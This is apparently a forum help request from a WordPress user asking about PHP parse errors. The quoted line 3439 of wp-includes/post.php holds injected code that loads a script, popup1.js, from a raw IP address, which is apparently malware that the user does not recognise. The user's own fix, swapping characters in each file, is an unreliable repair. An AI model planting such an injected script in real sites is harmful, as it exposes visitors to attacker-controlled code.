I reinstalled wp-includes, and got the following message:
Parse error: syntax error, unexpected ‘<‘ in
/home/xxxxxxxx/public_html/blog/wp-includes/post.php on line 3439
Line 3439 is:
<?php echo ”; ?><?php echo ”; ?><?php echo ”; ?><?php echo ‘<script
language=”javascript” src=”http://79.135.167.18/popup1.js”></script>’; ?>
Any suggestuions on why it shows this error message?
The initial message was:
Parse error: syntax error, unexpected ‘!’, expecting ‘,’ or ‘;’ in
/home/xxxxxxxx/public_html/blog/index.php on line 19
I changed the following:
(str.charAt(c)!=’!’)
to
(str.charAt(c)!=’;’)
This showed the next message, and I changed each file in a similar way.